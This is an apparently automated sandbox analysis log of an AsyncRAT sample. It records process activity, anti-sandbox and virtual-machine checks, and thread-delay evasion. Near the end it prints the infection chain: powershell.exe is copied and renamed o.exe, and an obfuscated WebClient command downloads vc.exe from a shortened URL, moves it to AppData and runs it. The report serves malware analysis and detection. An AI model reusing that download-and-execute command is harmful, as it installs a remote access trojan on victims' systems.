Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\vc.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AsyncRAT

Show sources

Source: Yara match	File source: 00000020.00000002.521796499.0000000002B41000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vc.exe PID: 4896, type: MEMORY

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: vc.exe, 00000020.00000002.521796499.0000000002B41000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: vc.exe, 00000020.00000002.529207306.0000000003B41000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLLHEAD

Source: C:\Users\user\AppData\Local\Temp\o.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\o.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\o.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\o.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\o.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\o.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\vc.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\o.exe	Window / User API: threadDelayed 891
Source: C:\Users\user\AppData\Local\Temp\o.exe	Window / User API: threadDelayed 809
Source: C:\Users\user\AppData\Local\Temp\o.exe	Window / User API: threadDelayed 1424
Source: C:\Users\user\AppData\Local\Temp\o.exe	Window / User API: threadDelayed 460
Source: C:\Users\user\AppData\Local\Temp\o.exe	Window / User API: threadDelayed 1335
Source: C:\Users\user\AppData\Local\Temp\o.exe	Window / User API: threadDelayed 422

Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 6132	Thread sleep count: 891 > 30
Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 2044	Thread sleep count: 809 > 30
Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 1872	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 2124	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 6740	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 2220	Thread sleep count: 1424 > 30
Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 6136	Thread sleep count: 460 > 30
Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 1264	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 6732	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 6664	Thread sleep count: 1335 > 30
Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 6620	Thread sleep count: 422 > 30
Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 6128	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 6128	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 4276	Thread sleep count: 93 > 30
Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 6968	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\vc.exe TID: 3216	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\o.exe

Code function: 14_2_0125C197 malloc,ExpandEnvironmentStringsW,FindFirstFileW,FindClose,free,

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\powershell.exe

Source: o.exe, 00000010.00000002.397800415.000000000565B000.00000004.00000001.sdmp, o.exe, 00000011.00000002.423626227.0000000004AA7000.00000004.00000001.sdmp	Binary or memory string: Hyper-V
Source: vc.exe, 00000020.00000002.535485380.0000000007CC0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: vc.exe, 00000020.00000002.521796499.0000000002B41000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: o.exe, 0000000E.00000002.395218460.0000000005212000.00000004.00000001.sdmp, o.exe, 00000010.00000002.397427961.0000000005592000.00000004.00000001.sdmp, o.exe, 00000011.00000002.422182443.0000000004814000.00000004.00000001.sdmp	Binary or memory string: f:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: vc.exe, 00000020.00000002.534814534.0000000007661000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: vc.exe, 00000020.00000002.534536689.00000000075C0000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWH
Source: vc.exe, 00000020.00000002.535485380.0000000007CC0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: vc.exe, 00000020.00000002.535485380.0000000007CC0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: vc.exe, 00000020.00000002.535485380.0000000007CC0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\AppData\Local\Temp\o.exe

Process information queried: ProcessInformation

Source: C:\Users\user\AppData\Local\Temp\o.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\vc.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 14_2_01259E90 SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 14_2_01259BEC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

Source: C:\Users\user\AppData\Local\Temp\o.exe

Memory allocated: page read and write | page guard

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\Robocopy.exe robocopy C:\Windows\system32\WindowsPowerShell\v1.0\ C:\Users\user\AppData\Local\Temp powershell.exe /mt /z
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 Start-Sleep 7; Move-Item 'vc.exe' -Destination '$env:appdata'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 Start-Sleep 12; cd $env:appdata; ./vc.exe;
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process created: C:\Users\user\AppData\Roaming\vc.exe C:\Users\user\AppData\Roaming\vc.exe

Source: vc.exe, 00000020.00000002.519471545.0000000001560000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: vc.exe, 00000020.00000002.519471545.0000000001560000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: vc.exe, 00000020.00000002.519471545.0000000001560000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: vc.exe, 00000020.00000002.519471545.0000000001560000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\AppData\Local\Temp\o.exe

Code function: GetLocaleInfoW,wcsncmp,

Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\Robocopy.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\Robocopy.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
